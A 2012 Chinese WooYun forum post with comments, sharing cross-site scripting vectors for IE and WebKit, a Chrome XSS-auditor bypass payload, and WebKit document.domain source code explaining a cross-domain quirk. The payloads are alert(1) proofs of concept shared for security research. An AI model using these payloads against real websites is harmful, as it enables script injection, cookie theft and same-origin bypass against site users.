分享几个最近搞的XSS向量

  • A+
所属分类:WooYun-Zone

<img src=`<body/onload=alert(1) />

IE在识别tag的时候必须有tag结束界定符,由于src只有属性界定符的原因,<img不被认为是一个tag,所以<body/onload=alert(1) />被解析了.

<!-- `<img/src=xx:xx onerror=alert(1)//--!>

IE,属性界定符在注释tag中可以打破>结束符,使用前面的注释tag失效.(具体原因我也不是很清楚)

<svg/onload=domain=id>

最共22字符,webkit系浏览器有效.

这里的domain=id相当与document.domain=”

正常情况下是无法执行的.

配合一个webkit的bug,在host后面加个点即可执行,不过官方并不认为这是一个bug.

范例:http://fiddle.jshell.net./KG7fR/5/show (从jsfiddle跨到jsbin)

  1. 1#

    xsser | 2012-05-26 22:18

    赞这种分享!!!!

  2. 2#

    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-05-26 22:57

    好东西。。现在想问chrome怎么xss

  3. 3#

    Sogili (.) 长短短 (.) | 2012-05-26 23:05

    @蟋蟀哥哥 你指的是绕过chrome的xss审查器吗?

  4. 4#

    Xhm1n9 | 2012-05-26 23:12

    学习了:)

  5. 5#

    蟋蟀哥哥 (̷ͣ̑̆ͯ̆̋͋̒ͩ͊̋̇̒ͦ̿̐͞҉̷̻̖͎̦̼) | 2012-05-26 23:46

    @Sogili 是的。google防xss比较厉害,目前纯xss没有办法绕过。只有借助flash等第三方才可以进行绕过

  6. 6#

    Sogili (.) 长短短 (.) | 2012-05-26 23:56

    @蟋蟀哥哥 <svg><script/xlink:href=data:,alert(1)></script>你试试

  7. 7#

    冷冷的夜 (1) | 2012-05-27 12:21

    @Sogili 感谢分享

  8. 8#

    p.z | 2012-05-27 12:31

    感谢分享!

  9. 9#

    gainover | 2012-05-27 13:07

    <img src=`<body/onload=alert(1) />

    反引号这个,在IE9里被修复了。 直接整个<img src=`<body/onload=alert(1) /> 都被当文本显示了。

  10. 10#

    CnCxzSec(衰仔) | 2012-05-27 13:54

    感谢@Sogili 分享!

  11. 11#

    rayh4c | 2012-05-27 21:27

    @Sogili http://code.google.com/p/chromium/issues/detail?id=103384 = = 跨域的这个还真奇葩~

  12. 12#

    Sogili (.) 长短短 (.) | 2012-05-27 22:54

    @rayh4c

    void Document::setDomain(const String& newDomain, ExceptionCode& ec)
    {
        if (SecurityOrigin::isDomainRelaxationForbiddenForURLScheme(securityOrigin()->protocol())) {
            ec = SECURITY_ERR;
            return;
        }

        // Both NS and IE specify that changing the domain is only allowed when
        // the new domain is a suffix of the old domain.

        // FIXME: We should add logging indicating why a domain was not allowed.

        // If the new domain is the same as the old domain, still call
        // securityOrigin()->setDomainForDOM. This will change the
        // security check behavior. For example, if a page loaded on port 8000
        // assigns its current domain using document.domain, the page will
        // allow other pages loaded on different ports in the same domain that
        // have also assigned to access this page.
        if (equalIgnoringCase(domain(), newDomain)) {
            securityOrigin()->setDomainFromDOM(newDomain);
            if (m_frame)
                m_frame->script()->updateSecurityOrigin();
            return;
        }

        int oldLength = domain().length();
        int newLength = newDomain.length();
        // e.g. newDomain = webkit.org (10) and domain() = www.webkit.org (14)
        if (newLength >= oldLength) {
            ec = SECURITY_ERR;
            return;
        }

        String test = domain();
        // Check that it's a subdomain, not e.g. "ebkit.org"
        if (test[oldLength - newLength - 1] != '.') {
            ec = SECURITY_ERR;
            return;
        }

        // Now test is "webkit.org" from domain()
        // and we check that it's the same thing as newDomain
        test.remove(0, oldLength - newLength);
        if (test != newDomain) {
            ec = SECURITY_ERR;
            return;
        }

        securityOrigin()->setDomainFromDOM(newDomain);
        if (m_frame)
            m_frame->script()->updateSecurityOrigin();
    }

    Adam Barth 08年发现了这个问题并报给了webkit,要求调用updateSecurityOrigin检测源(https://bugs.webkit.org/show_bug.cgi?id=22776).
    但ScriptController的updateSecurityOrigi是一个空实现.

  13. 13#

    凤凰 (凤凰涅磐,浴火重生) | 2012-05-29 17:28

    牛人!学习了

  14. 14#

    HuGtion | 2012-05-31 11:02

    谢谢分享!

  15. 15#

    xsser_w (看个J8,SB!) | 2012-06-13 18:00

    = =! niubility